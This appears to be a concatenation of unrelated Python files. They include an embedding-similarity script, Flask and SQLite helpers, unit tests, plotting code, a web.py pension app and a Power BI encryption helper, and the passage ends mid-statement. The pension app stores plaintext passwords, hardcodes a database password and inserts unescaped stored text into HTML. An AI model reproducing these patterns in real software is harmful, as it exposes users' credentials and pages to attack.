    sentences_embeddings = embedder.encode(document)
    sentences_embeddings = np.array(sentences_embeddings)
    document_embedding = np.mean(sentences_embeddings, axis = 0)
    corpus_embeddings.append(document_embedding)
# Query sentences:
#
#similarity_matrix = []
#for first_doc in corpus_embeddings:
# similarity_vector = []
# for second_doc in corpus_embeddings:
# similarity_vector.append(1 - scipy.spatial.distance.cosine(first_doc, second_doc))
# similarity_matrix.append(similarity_vector)
#
#similarity_matrix = np.array(similarity_matrix)
#print(similarity_matrix)
# Find the closest 5 sentences of the corpus for each query sentence based on cosine similarity
# For each document, print the 5 nearest corpus documents by cosine similarity
# (the document itself is included, so it appears as its own best match).
closest_n = 5
index = 0
for query, query_embedding in zip(corpus, corpus_embeddings):
    # Cosine distance from this document to every corpus document.
    distances = scipy.spatial.distance.cdist([query_embedding], corpus_embeddings, "cosine")[0]
    results = zip(range(len(distances)), distances)
    results = sorted(results, key=lambda x: x[1])
    print("\n\n======================\n\n")
    print("Document query index:", index)
    print("\nMost similar document in corpus:")
    for idx, distance in results[0:closest_n]:
        # Report similarity (1 - distance) for readability.
        print(corpus[idx][0], "(Score: %.4f)" % (1-distance))
    index = index + 1
|
"""
Database stuff.
_
(Yes, I cut/pasted this from the flask docu. ¯\_(ツ)_/¯ )
"""
import sqlite3
from flask import g, session
from flask import flash
import sys
import os
from app import app
DATABASE = 'roborank'
def full_db_path(dbname=None):
    """Return the absolute path of the named competition database file.

    Falls back to the module-level DATABASE name when *dbname* is None.
    """
    chosen = DATABASE if dbname is None else dbname
    return os.path.join(app.config['COMPETITION_DIR'], chosen + '.db')
@app.teardown_appcontext
def close_connection(exception):
    """Close the per-appcontext database handle, if one was ever opened."""
    db = getattr(g, '_database', None)
    if db is None:
        return
    db.close()
def query_db(query, args=(), one=False):
    """Run *query* with *args* and return the rows.

    With one=True, return just the first row, or None when there are no rows.
    """
    cursor = get_db().execute(query, args)
    rows = cursor.fetchall()
    cursor.close()
    if one:
        return rows[0] if rows else None
    return rows
def get_db(dbname=None):
    """Open (and lazily initialize) the competition database.

    NOTE(review): mutates the module-level DATABASE name as a side effect,
    so later calls without *dbname* reuse the last database requested —
    confirm this is intentional.  Returns None when first-time
    initialization fails for a reason other than "already exists".
    """
    global DATABASE
    if dbname is None:
        dbname = DATABASE
    DATABASE = dbname
    # Does it exist yet? If not, set a flag to initialize it ... later.
    if not os.path.exists(full_db_path()):
        with app.app_context():
            db = sqlite3.connect(full_db_path())
            # Seed the new database from the bundled SQL template.
            with app.open_resource('{}.sql'.format('roborank-template'), mode='r') as f:
                try:
                    db.cursor().executescript(f.read())
                    db.commit()
                    print('Database "{}" created and initialized'.format(dbname))
                except sqlite3.OperationalError as e:
                    if 'already exists' not in e.args[0]:
                        print("Couldn't create database '{0}': {1}".format(dbname, e.args[0]), file=sys.stderr)
                        return
    db = sqlite3.connect(full_db_path())
    # Row factory gives dict-like rows (see row_to_dict).
    db.row_factory = sqlite3.Row
    return db
def row_to_dict(r):
    """Convert a sqlite3.Row (or any keyed row) into a plain dict."""
    return {key: r[key] for key in r.keys()}
from CvPythonExtensions import *
import CvUtil
import CvScreenEnums
gc = CyGlobalContext()
class CvPediaConcepts:
    """Civilopedia screen section that renders concept articles."""
    def __init__(self, main):
        # Keep a handle to the parent pedia screen and mirror its page geometry.
        self.top = main
        self.X_TEXT = self.top.X_PEDIA_PAGE
        self.Y_TEXT = self.top.Y_PEDIA_PAGE
        self.H_TEXT = self.top.H_PEDIA_PAGE
        self.W_TEXT = self.top.W_PEDIA_PAGE
    def interfaceScreen(self, iEntry):
        """Show the pedia page for concept entry *iEntry*."""
        self.placeText(iEntry)
    def placeText(self, iEntry):
        """Draw the concept's civilopedia text inside a panel."""
        screen = self.top.getScreen()
        panel = self.top.getNextWidgetName()
        text = self.top.getNextWidgetName()
        # Classic concepts get explicit font markup; "new" concepts do not.
        if self.top.iCategory == CvScreenEnums.PEDIA_CONCEPTS:
            szText = "<font=2>" + gc.getConceptInfo(iEntry).getCivilopedia() + "</font>"
        else:
            szText = gc.getNewConceptInfo(iEntry).getCivilopedia()
        screen.addPanel(panel, "", "", True, True, self.X_TEXT, self.Y_TEXT, self.W_TEXT, self.H_TEXT, PanelStyles.PANEL_STYLE_BLUE50)
        screen.addMultilineText(text, szText, self.X_TEXT + 10, self.Y_TEXT + 10, self.W_TEXT - 10, self.H_TEXT - 20, WidgetTypes.WIDGET_GENERAL, -1, -1, CvUtil.FONT_LEFT_JUSTIFY)
    def handleInput(self, inputClass):
        """This page handles no interactive input."""
        return 0
|
import json
import os
from datetime import datetime
import click
import pytz
from click import ClickException
from cmr import render
from connect.cli.core.http import get_user_agent
from connect.cli.plugins.report.constants import AVAILABLE_RENDERERS, AVAILABLE_REPORTS
from connect.cli.plugins.report.utils import (
get_renderer_by_id,
get_report_by_id,
get_report_entrypoint,
handle_report_exception,
Progress,
)
from connect.cli.plugins.report.wizard import get_report_inputs
from connect.client import ConnectClient
from connect.reports.constants import CLI_ENV
from connect.reports.datamodels import Account, Report
from connect.reports.parser import parse
from connect.reports.renderers import get_renderer
from connect.reports.validator import validate, validate_with_schema
def load_repo(repo_dir):
    """Load and validate a reports project rooted at *repo_dir*.

    :param repo_dir: directory expected to contain a ``reports.json`` descriptor
    :return: the parsed repository object
    :raises ClickException: when the descriptor is missing, not valid JSON,
        or fails schema/semantic validation
    """
    cfg = os.path.join(repo_dir, 'reports.json')
    if not os.path.isfile(cfg):
        raise ClickException(
            f'The directory `{repo_dir}` is not a reports project root directory.',
        )
    try:
        # BUG FIX: the original leaked the file handle via json.load(open(...));
        # a context manager closes it deterministically.
        with open(cfg, 'r') as f:
            descriptor = json.load(f)
    except json.JSONDecodeError:
        raise ClickException(
            'The reports project descriptor `reports.json` is not a valid json file.',
        )
    errors = validate_with_schema(descriptor)
    if errors:
        raise ClickException(f'Invalid `reports.json`: {errors}')
    repo = parse(repo_dir, descriptor)
    errors = validate(repo)
    if errors:
        raise ClickException(f'Invalid `reports.json`: {",".join(errors)}')
    return repo
def list_reports(repo_dir):
    """Print a markdown summary of every report defined in the project."""
    repo = load_repo(repo_dir)
    parts = [
        f'# {repo.name} version {repo.version}\n',
        '---\n\n',
        repo.description,
        '\n\n---\n\n',
    ]
    if repo.reports:
        parts.append(AVAILABLE_REPORTS)
        parts.extend(f'| {report.local_id} | {report.name} |\n' for report in repo.reports)
    click.echo(render(''.join(parts)))
def show_report_info(repo_dir, local_id):
    """Print a markdown detail view of one report, listing its renderers."""
    repo = load_repo(repo_dir)
    report = get_report_by_id(repo, local_id)
    parts = [
        f'# {report.name} (ID: {report.local_id})\n',
        '---\n\n',
        report.description,
        '\n\n---\n\n',
        AVAILABLE_RENDERERS,
    ]
    for renderer in report.renderers:
        # Check-mark the project's default renderer.
        marker = '\u2713' if renderer.id == report.default_renderer else ' '
        parts.append(
            f'| {renderer.id} | {renderer.description} | {marker} |\n')
    click.echo(render(''.join(parts)))
def execute_report(config, reports_dir, report_id, output_file, output_format):
    """Run one report end-to-end: validate audience, gather inputs, render output."""
    repo = load_repo(reports_dir)
    report = get_report_by_id(repo, report_id)
    # Account-type guard: VA = vendor, PA = provider account IDs.
    if config.active.id.startswith('VA') and 'vendor' not in report.audience:
        raise ClickException(
            "This report is not expected to be executed on vendor accounts",
        )
    if config.active.id.startswith('PA') and 'provider' not in report.audience:
        raise ClickException(
            "This report is not expected to be executed on provider accounts",
        )
    entrypoint = get_report_entrypoint(report)
    client = ConnectClient(
        config.active.api_key,
        endpoint=config.active.endpoint,
        use_specs=False,
        default_limit=500,
        max_retries=3,
        default_headers=get_user_agent(),
    )
    # Interactive wizard collects the report's declared parameters.
    inputs = get_report_inputs(config, client, report.get_parameters())
    click.echo(f'Preparing to run report {report_id}. Please wait...\n')
    progress = Progress(report.name)
    renderer_def = get_renderer_by_id(report, output_format or report.default_renderer)
    renderer = get_renderer(
        renderer_def.type,
        CLI_ENV,
        reports_dir,
        Account(config.active.id, config.active.name),
        Report(report.local_id, report.name, report.description, inputs),
        renderer_def.template,
        renderer_def.args,
    )
    try:
        args = [client, inputs, progress]
        # Spec v2 entrypoints also receive the renderer type and a
        # callback for injecting extra template context.
        if report.report_spec == '2':
            args.extend(
                [
                    renderer_def.type,
                    renderer.set_extra_context,
                ],
            )
        data = entrypoint(*args)
        out = renderer.render(data, output_file, start_time=datetime.now(tz=pytz.utc))
    except Exception:
        # Any failure is reported uniformly and aborts before the success message.
        handle_report_exception()
        return
    finally:
        progress.close()
    click.echo(f'\nReport has been completed and saved as {out}\n')
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from vas.web_server.Instances import Instance
from vas.web_server.Logs import Logs
from vas.web_server.NodeInstances import NodeInstances, NodeInstance
from vas.web_server.NodeLiveConfigurations import NodeLiveConfigurations
from vas.web_server.Nodes import Node
from vas.test.VasTestCase import VasTestCase
class TestNodeInstances(VasTestCase):
    """Tests for the web-server node-instance collection and item resources."""
    def test_list(self):
        """The collection endpoint enumerates node instances."""
        self._assert_collection(NodeInstances(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/'))
    def test_detail(self):
        """An instance item exposes its related resources and attributes."""
        self._assert_item(NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/'), [
            ('group_instance', lambda actual: self.assertIsInstance(actual, Instance)),
            ('live_configurations', lambda actual: self.assertIsInstance(actual, NodeLiveConfigurations)),
            ('logs', lambda actual: self.assertIsInstance(actual, Logs)),
            ('name', 'example'),
            ('node', lambda actual: self.assertIsInstance(actual, Node)),
            ('state', 'STOPPED')
        ])
    def test_start(self):
        """start() must POST a STARTED status to the instance's state resource."""
        NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/').start()
        self._assert_post('https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', {'status': 'STARTED'})
    def test_stop(self):
        """stop() must POST a STOPPED status to the instance's state resource."""
        NodeInstance(self._client, 'https://localhost:8443/web-server/v1/nodes/0/instances/3/').stop()
        self._assert_post('https://localhost:8443/web-server/v1/nodes/0/instances/3/state/', {'status': 'STOPPED'})
|
from . import db
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import UserMixin
from . import login_manager
from datetime import datetime
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: fetch the User for a session's stored id."""
    return User.query.get(int(user_id))
class User(UserMixin,db.Model):
    """Application account, integrated with Flask-Login via UserMixin."""
    __tablename__ = 'users'
    id = db.Column(db.Integer,primary_key = True)
    username = db.Column(db.String(255), index = True)
    email = db.Column(db.String(255),unique = True, index = True)
    bio = db.Column(db.String(255))
    profile_pic_path = db.Column(db.String())
    password_hash = db.Column(db.String(255))
    comments = db.relationship('Comment', backref='user', lazy="dynamic")
    posts = db.relationship('Post', backref='user', lazy = "dynamic")
    @property
    def password(self):
        """Write-only attribute: reading the plaintext password is forbidden."""
        raise AttributeError('You cannot read the password attribute')
    @password.setter
    def password(self, password):
        # Store only a salted hash, never the plaintext.
        self.password_hash = generate_password_hash(password)
    def verify_password(self, password):
        """Check *password* against the stored hash."""
        return check_password_hash(self.password_hash, password)
    def __repr__(self):
        return f'User {self.username}'
class Category(db.Model):
    """A named post category."""
    __tablename__="categories"
    id=db.Column(db.Integer,primary_key=True)
    name=db.Column(db.String(255))
class Post(db.Model):
    """A blog post authored by a user."""
    __tablename__ = 'posts'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(255))
    text = db.Column(db.String)
    title = db.Column(db.String)
    username = db.Column(db.String(255), index=True)
    post_id = db.Column(db.Integer)
    category = db.Column(db.String(255))
    posted = db.Column(db.DateTime, default=datetime.utcnow)
    user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
    comments = db.relationship('Comment', backref='posts', lazy='dynamic')

    def save_post(self):
        """Persist this post to the database."""
        db.session.add(self)
        db.session.commit()

    def get_posts(self):
        """Return every post."""
        posts = Post.query.all()
        return posts

    def get_post(self):
        """Return the query for posts matching this instance's post_id.

        BUG FIX: ``filter_by()`` accepts keyword arguments only; the
        original passed a bare positional ``post_id`` and raised
        TypeError at call time.
        """
        post = Post.query.filter_by(post_id=self.post_id)
        return post

    def __repr__(self):
        return f'User {self.name}'
class Comment(db.Model):
    """A comment attached to a post."""
    __tablename__ = 'comments'
    id = db.Column(db.Integer, primary_key=True)
    post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
    comment_id = db.Column(db.Integer)
    title = db.Column(db.String)
    username = db.Column(db.String(255), index=True)
    text = db.Column(db.String)
    posted = db.Column(db.DateTime, default=datetime.utcnow)
    user_id = db.Column(db.Integer, db.ForeignKey("users.id"))

    def save_comment(self):
        """Persist this comment to the database."""
        db.session.add(self)
        db.session.commit()

    def get_comments(self):
        """Return every comment."""
        comments = Comment.query.all()
        return comments

    def get_comment(self):
        """Return the query for comments matching this instance's comment_id.

        BUG FIX: ``filter_by()`` accepts keyword arguments only; the
        original passed a bare positional ``comment_id`` and raised
        TypeError at call time.
        """
        comment = Comment.query.filter_by(comment_id=self.comment_id)
        return comment
class Quote:
    """Plain value object holding one quote from the external quote API."""

    def __init__(self, id, quote, author):
        # `id` mirrors the API payload's field name (shadows the builtin).
        self.id, self.quote, self.author = id, quote, author
|
from matplotlib.pyplot import figure
from matplotlib.ticker import ScalarFormatter
import xarray
sfmt = ScalarFormatter(useMathText=True) # for 10^3 instead of 1e3
sfmt.set_powerlimits((-2, 2))
sfmt.set_scientific(True)
sfmt.set_useOffset(False)
def plotigrf(mag: xarray.Dataset, model: str):
    """Plot IGRF field components (north/east/down) plus declination/inclination."""
    mode = "contour"
    fg = figure(figsize=(10, 8))
    ax = fg.subplots(2, 2, sharex=True)
    fg.suptitle(f"IGRF{model} {mag.time}")
    ax = ax.ravel()
    # First three axes get the vector components; ax[3] is filled below.
    for a, i in zip(ax, ("north", "east", "down")):
        if mode == "pcolor":
            # symmetric vmin,vmax centers white at zero: bwr cmap
            hi = a.pcolormesh(mag.glon, mag.glat, mag[i], cmap="bwr", vmin=-6e4, vmax=6e4)
            fg.colorbar(hi, ax=a, format=sfmt)
        elif mode == "contour":
            hi = a.contour(mag.glon, mag.glat, mag[i])
            a.clabel(hi, inline=True, fmt="%0.1f")
        else:
            raise ValueError(f"unknown plot type {mode}")
        a.set_title("{} [nT]".format(i))
    for a in ax[[0, 2]]:
        a.set_ylabel("Geographic latitude (deg)")
    for a in ax[[2, 3]]:
        a.set_xlabel("Geographic longitude (deg)")
    # NOTE(review): the block below reuses the leftover loop variable `a`,
    # which at this point is ax[3] from the preceding xlabel loop — fragile
    # but it does target the unused fourth axis.
    if mag.isv == 0:
        if mode == "pcolor":
            hi = a.pcolormesh(mag.glon, mag.glat, mag["total"])
            fg.colorbar(hi, ax=a, format=sfmt)
        elif mode == "contour":
            hi = a.contour(mag.glon, mag.glat, mag.total)
            a.clabel(hi, inline=True, fmt="%0.1f")
        else:
            raise ValueError(f"unknown plot type {mode}")
        a.set_title("$B$ total intensity [nT]")
    # %% incl, decl
    fg = figure()
    fg.suptitle(f"IGRF{model} {mag.time}")
    ax = fg.subplots(1, 2, sharey=True)
    hi = ax[0].contour(mag.glon, mag.glat, mag.decl, range(-90, 90 + 20, 20))
    ax[0].clabel(hi, inline=True, fmt="%0.1f")
    ax[0].set_title("Magnetic Declination [degrees]")
    hi = ax[1].contour(mag.glon, mag.glat, mag.incl, range(-90, 90 + 20, 20))
    ax[1].clabel(hi, inline=True, fmt="%0.1f")
    ax[1].set_title("Magnetic Inclination [degrees]")
    ax[0].set_ylabel("Geographic latitude (deg)")
    for a in ax:
        a.set_xlabel("Geographic longitude (deg)")
def plotdiff1112(mag12: xarray.Dataset, mag11: xarray.Dataset):
    """Plot per-component and total-intensity differences IGRF12 - IGRF11."""
    for i in ("x", "y", "z"):
        fg = figure()
        ax = fg.gca()
        # extent maps longitude to x and latitude to y.
        hi = ax.imshow(
            mag12[i] - mag11[i],
            extent=(mag12.glon[0], mag12.glon[-1], mag12.glat[0], mag12.glat[-1]),
        )
        fg.colorbar(hi, format=sfmt)
        ax.set_ylabel("latitude (deg)")
        ax.set_xlabel("longitude (deg)")
        ax.set_title(f"IGRF12-IGRF11 {i}-field comparison on {mag12.time}")
    if mag12.isv == 0:
        fg = figure()
        ax = fg.gca()
        hi = ax.imshow(
            mag12["Btotal"] - mag11["Btotal"],
            extent=(mag12.glon[0], mag12.glon[-1], mag12.glat[0], mag12.glat[-1]),
        )
        fg.colorbar(hi)
        # BUG FIX: the extent puts longitude on x / latitude on y (matching
        # the loop above), but these labels were swapped in the original.
        ax.set_xlabel("longitude (deg)")
        ax.set_ylabel("latitude (deg)")
        ax.set_title(f"IGRF12-IGRF11 $B$: total intensity [nT] {mag12.time}")
|
#!/usr/bin/python
import web
import MySQLdb
import sqlite3
import urllib2
# Template renderer and URL routing table (web.py style: pattern, class name).
render = web.template.render('templates/')
urls = (
    '/', 'index',
    '/login', 'login',
    '/auth', 'auth',
    '/register', 'register',
    '/about', 'about',
    '/user/(.*)', 'user',
    '/masthead', 'masthead',
    '/faq', 'faq',
    '/how', 'how',
    '/logout', 'logout',
    '/account', 'account',
    '/(.*)', 'nopage'
)
# Database constants.
# NOTE(review): only `apptitle` is actually used to name the SQLite file;
# the DB_* constants below are not referenced in this file — confirm use.
DBN = 'sqlite'
DB_TABLE = 'users'
DB_USER = 'test'
DB_PASS = '123456'
DB_HOST = '127.0.0.1'
DB_PORT = 80
#app title
apptitle = 'Penbot'
#app description
appdescription = [apptitle,'An automated cloud based pension software that runs itself']
#login info
loginfo = ''
# Shared SQLite connection/cursor (check_same_thread=False allows use
# from web.py worker threads).
conn = sqlite3.connect(apptitle+'.db',check_same_thread=False)
cur = conn.cursor()
#db = web.database(dbn=DBN, db=apptitle+'.db')
#create user info table
cur.execute('''CREATE TABLE IF NOT EXISTS users
(id INTEGER PRIMARY KEY AUTOINCREMENT,
fullname TEXT,
email TEXT,
phone TEXT,
password TEXT,
chkuser TEXT);
''')
#create activities table
cur.execute('''CREATE TABLE IF NOT EXISTS activities
(id INTEGER PRIMARY KEY AUTOINCREMENT,
uid INTEGER,
typ TEXT,
descr TEXT,
tym TEXT);
''')
#app calling
app = web.application(urls, globals())
# Disk-backed sessions, created once and cached on web.config so the
# session survives web.py's module reloading in debug mode.
if web.config.get('_session') is None:
    session = web.session.Session(app,web.session.DiskStore('./sessions'),
        initializer= {'id':0,'uname': 'null','auth':0,'email':'null','phone':'null','fullname':'null','udata':'null'})
    web.config._session = session
else:
    session = web.config._session
#get header
def get_header(name):
    """Build the shared masthead fragment for the page titled *name*."""
    return render.masthead(name, session.udata, appdescription)
#insert new user
def new_user(fullname, email, phone, password):
    """Create a user account unless the email is already registered.

    Returns 1 on successful insert, 0 on insert failure, or a rendered
    error page when the email already exists.
    """
    global cur
    # NOTE(review): existence is probed via a side-effecting UPDATE whose
    # rowcount counts accounts already using this email — confirm intent.
    existing = cur.execute("update users set chkuser='' where email=?", (email,)).rowcount
    # BUG FIX: the original compared with `is 0` (identity), which only
    # works by accident via CPython's small-int cache; use `==`.
    if existing == 0:
        if cur.execute("insert into users(fullname,email,phone,password,chkuser) values (?,?,?,?,?)", (fullname, email, phone, password, '',)):
            return 1
        else:
            return 0
    else:
        loginfo = 'An account with this email address, ' + email + ' already exists'
        return render.incorrect('Oops...', loginfo)
#new activity
def new_activity(_id, typ, descr):
    """Record an activity row for user *_id*.

    Returns 1 on successful insert, 0 on insert failure, or a rendered
    error page when the user does not exist.
    """
    global cur
    # Existence check via side-effecting UPDATE; rowcount == 1 means the user exists.
    verifyuser = cur.execute("update users set chkuser='' where id=?", (_id,)).rowcount
    print(verifyuser)  # debug trace kept from the original
    # BUG FIX: `is 1` identity comparison replaced with `==`.
    if verifyuser == 1:
        if cur.execute("insert into activities(uid,typ,descr) values (?,?,?)", (_id, typ, descr,)):
            return 1
        else:
            return 0
    else:
        loginfo = 'An error occured'
        return render.incorrect('Oops...', loginfo)
#get activities
def get_activities():
    """Return the logged-in user's activity descriptions as an HTML fragment."""
    global session
    global cur
    rows = cur.execute("SELECT * from activities where uid=?", (session.id,))
    # Collect fragments and join once instead of quadratic string +=.
    chunks = []
    for row in rows:
        print(row[3])  # debug trace kept from the original
        chunks.append('<div class="activities">' + row[3] + '</div>')
    return ''.join(chunks)
class index:
    """Home page."""
    def GET(self):
        title = 'Home'
        return render.index(title, appdescription, get_header(title))
class login:
    """Login form page."""
    def GET(self):
        title = 'Login'
        return render.login(title, appdescription, get_header(title))
class logout:
    """Kill the session and redirect to the home page."""
    def GET(self):
        name = 'Logout'
        getheader = get_header(name)  # NOTE(review): unused result — confirm it is needed
        session.kill()
        # NOTE(review): get_header('') lands in web.seeother's second
        # parameter (web.py's `absolute` flag) — confirm this is intended.
        return web.seeother('/',get_header(''))
class account:
    """Signup form handler."""
    def POST(self):
        global session
        i = web.input()
        # Create the account from the submitted form fields.
        adduser = new_user(i.fullname, i.email, i.phone, i.password)
        # BUG FIX: `is not 0` identity comparison replaced with `!=`.
        if adduser != 0:
            loginfo = 'Account was successfully created.'
            return render.successful('Welcome to ' + apptitle, loginfo, 'login')
        else:
            loginfo = 'An error occured, please try again in a few minutes.'
            return render.incorrect('Oops...', loginfo)
class auth:
    """Validate login credentials and populate the session."""
    def POST(self):
        global session
        global conn
        global cur
        i = web.input()
        tuser = (i.user, i.passw)
        auth_pass = 0
        # NOTE(review): credentials are checked via a side-effecting UPDATE
        # whose rowcount counts matching accounts — confirm intent.
        verifyuser = cur.execute("update users set chkuser='' where email=? and password=?", tuser).rowcount
        # BUG FIX: `is 1` / `is 0` identity comparisons replaced with `==`.
        if verifyuser == 1:
            authuser = cur.execute("SELECT id,fullname,email,phone,password from users where email=? and password=?", tuser)
            for row in authuser:
                auth_pass = 1
                session.id = row[0]
                session.name = row[1]
                session.email = row[2]
                session.phone = row[3]
            session.udata = [session.id, session.name, session.email, session.phone]
        if auth_pass == 0:
            loginfo = 'Incorrect login credentials'
            return render.incorrect('Unable to sign in', loginfo)
        else:
            new_activity(str(session.id), 'login', 'You logged in to your account')
            return web.seeother('/user/' + session.name, get_header(''))
class register:
    """Handler for GET /register — renders the sign-up page."""
    def GET(self):
        title = 'Register'
        return render.register(title, appdescription, get_header(title))
class about:
    """Handler for GET /about — renders the about page."""
    def GET(self):
        title = 'About'
        return render.about(title, appdescription, get_header(title))
class faq:
    """Handler for GET /faq — renders the FAQ page."""
    def GET(self):
        title = 'FAQ'
        return render.faq(title, appdescription, get_header(title))
class how:
    """Handler for GET /how — explains how the application works."""
    def GET(self):
        title = 'How '+apptitle+' works'
        return render.how(title, appdescription, get_header(title))
class user:
    """Handler for GET /user/<name> — renders a user's profile page."""
    def GET(self, name):
        # Guard clause: names of one character or fewer are not valid users.
        if len(name) <= 1:
            return render.notfound(name)
        excluder = 'ok'
        checkuser = session.udata
        return render.user(name, checkuser, excluder, get_header(name),
                           get_activities())
#not found
# 404 handler installed on the web.py application below; wraps the rendered
# not-found template in web.notfound().
# NOTE(review): passing `render` itself as the template argument looks odd —
# confirm what render.notfound() expects.
def notfound():
    return web.notfound(render.notfound(render))
#internal error
# 500 handler installed on the web.py application below; wraps the rendered
# internal-error template in web.internalerror().
def internalerror():
    return web.internalerror(render.internalerror(render))
# Install the custom 404/500 handlers on the web.py application.
app.notfound = notfound
app.internalerror = internalerror
# Catch-all URL handler: any otherwise-unmatched path renders the
# not-found page for that name.
class nopage:
    def GET(self, name):
        return render.notfound(name)
# Start the web.py development server when run as a script.
if __name__ == "__main__":
    app.run()
|
# Copyright 2019 Intel, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from unittest import mock
from cyborg.tests.unit.api.controllers.v2 import base as v2_test
from cyborg.tests.unit import fake_device
class TestDevicesController(v2_test.APITestV2):
    """Tests for the /devices REST controller."""

    DEVICE_URL = '/devices'

    def setUp(self):
        super(TestDevicesController, self).setUp()
        self.headers = self.gen_headers(self.context)
        self.fake_devices = fake_device.get_fake_devices_objs()

    def _validate_links(self, links, device_uuid):
        # The 'self' link must exist and end with the device's UUID.
        has_self_link = False
        for link in links:
            if link['rel'] == 'self':
                has_self_link = True
                url = link['href']
                components = url.split('/')
                self.assertEqual(components[-1], device_uuid)
        self.assertTrue(has_self_link)

    def _validate_device(self, in_device, out_device):
        # Compare every field except the internal DB id.
        for field in in_device.keys():
            if field != 'id':
                self.assertEqual(in_device[field], out_device[field])
        # Check that the link is properly set up
        self._validate_links(out_device['links'], in_device['uuid'])

    @mock.patch('cyborg.objects.Device.get')
    def test_get_one_by_uuid(self, mock_device):
        in_device = self.fake_devices[0]
        mock_device.return_value = in_device
        uuid = in_device['uuid']
        url = self.DEVICE_URL + '/%s'
        out_device = self.get_json(url % uuid, headers=self.headers)
        mock_device.assert_called_once()
        self._validate_device(in_device, out_device)

    @mock.patch('cyborg.objects.Device.list')
    def test_get_all(self, mock_devices):
        mock_devices.return_value = self.fake_devices
        data = self.get_json(self.DEVICE_URL, headers=self.headers)
        out_devices = data['devices']
        self.assertIsInstance(out_devices, list)
        for out_dev in out_devices:
            self.assertIsInstance(out_dev, dict)
        # BUG FIX: the original called assertTrue(len(a), len(b)); the second
        # argument of assertTrue is the failure *message*, so only truthiness
        # of len(a) was checked. Compare the lengths for real.
        self.assertEqual(len(out_devices), len(self.fake_devices))
        for in_device, out_device in zip(self.fake_devices, out_devices):
            self._validate_device(in_device, out_device)

    @mock.patch('cyborg.objects.Device.list')
    def test_get_with_filters(self, mock_devices):
        in_devices = self.fake_devices
        mock_devices.return_value = in_devices[:1]
        data = self.get_json(
            self.DEVICE_URL + "?filters.field=limit&filters.value=1",
            headers=self.headers)
        out_devices = data['devices']
        mock_devices.assert_called_once_with(mock.ANY, filters={"limit": "1"})
        for in_device, out_device in zip(self.fake_devices, out_devices):
            self._validate_device(in_device, out_device)

    @mock.patch('cyborg.objects.Device.list')
    def test_get_by_type(self, mock_devices):
        in_devices = self.fake_devices
        mock_devices.return_value = [in_devices[0]]
        data = self.get_json(
            self.DEVICE_URL + "?type=FPGA",
            headers=self.headers)
        out_devices = data['devices']
        mock_devices.assert_called_once_with(mock.ANY,
                                             filters={"type": "FPGA"})
        for in_device, out_device in zip(self.fake_devices, out_devices):
            self._validate_device(in_device, out_device)

    @mock.patch('cyborg.objects.Device.list')
    def test_get_by_vendor(self, mock_devices):
        in_devices = self.fake_devices
        mock_devices.return_value = [in_devices[0]]
        data = self.get_json(
            self.DEVICE_URL + "?vendor=0xABCD",
            headers=self.headers)
        out_devices = data['devices']
        mock_devices.assert_called_once_with(mock.ANY,
                                             filters={"vendor": "0xABCD"})
        for in_device, out_device in zip(self.fake_devices, out_devices):
            self._validate_device(in_device, out_device)

    @mock.patch('cyborg.objects.Device.list')
    def test_get_by_hostname(self, mock_devices):
        in_devices = self.fake_devices
        mock_devices.return_value = [in_devices[0]]
        data = self.get_json(
            self.DEVICE_URL + "?hostname=test-node-1",
            headers=self.headers)
        out_devices = data['devices']
        mock_devices.assert_called_once_with(
            mock.ANY, filters={"hostname": "test-node-1"})
        for in_device, out_device in zip(self.fake_devices, out_devices):
            self._validate_device(in_device, out_device)
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
import base64
import os
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from helper.authenticatedencryption import AuthenticatedEncryption
# Refer C# counterpart:
# https://github.com/microsoft/PowerBI-CSharp/blob/master/sdk/PowerBI.Api/Extensions/AsymmetricHigherKeyEncryptionHelper.cs
class AsymmetricHigherKeyEncryptionHelper:
    """RSA-OAEP wrapping of ephemeral AES/HMAC keys, mirroring the C# SDK helper."""

    KEY_LENGTHS_PREFIX = 2
    HMAC_KEY_SIZE_BYTES = 64
    AES_KEY_SIZE_BYTES = 32
    KEY_LENGTH_32 = 0
    KEY_LENGTH_64 = 1

    def encrypt(self, plain_text_bytes, modulus_bytes, exponent_bytes):
        '''Encrypt the message and RSA-wrap the ephemeral keys.

        Args:
            plain_text_bytes (bytes): Message to be encrypted
            modulus_bytes (bytes): Modulus bytes returned from GET gateway API
            exponent_bytes (bytes): Exponent bytes returned from GET gateway API
        Returns:
            String: base64(RSA-wrapped key blob) + base64(cipher text)
        '''
        # Fresh one-shot keys: 32-byte AES key, 64-byte HMAC key.
        aes_key = os.urandom(self.AES_KEY_SIZE_BYTES)
        hmac_key = os.urandom(self.HMAC_KEY_SIZE_BYTES)

        # Authenticated encryption of the payload with the ephemeral keys.
        cipher_text = AuthenticatedEncryption().encrypt(
            aes_key, hmac_key, plain_text_bytes)

        # Key blob layout: two length-marker bytes (AES-key marker, HMAC-key
        # marker), then the AES key, then the HMAC key.
        key_blob = bytes([self.KEY_LENGTH_32, self.KEY_LENGTH_64]) \
            + aes_key + hmac_key

        # Rebuild the gateway's RSA public key from its modulus/exponent.
        public_key = rsa.RSAPublicNumbers(
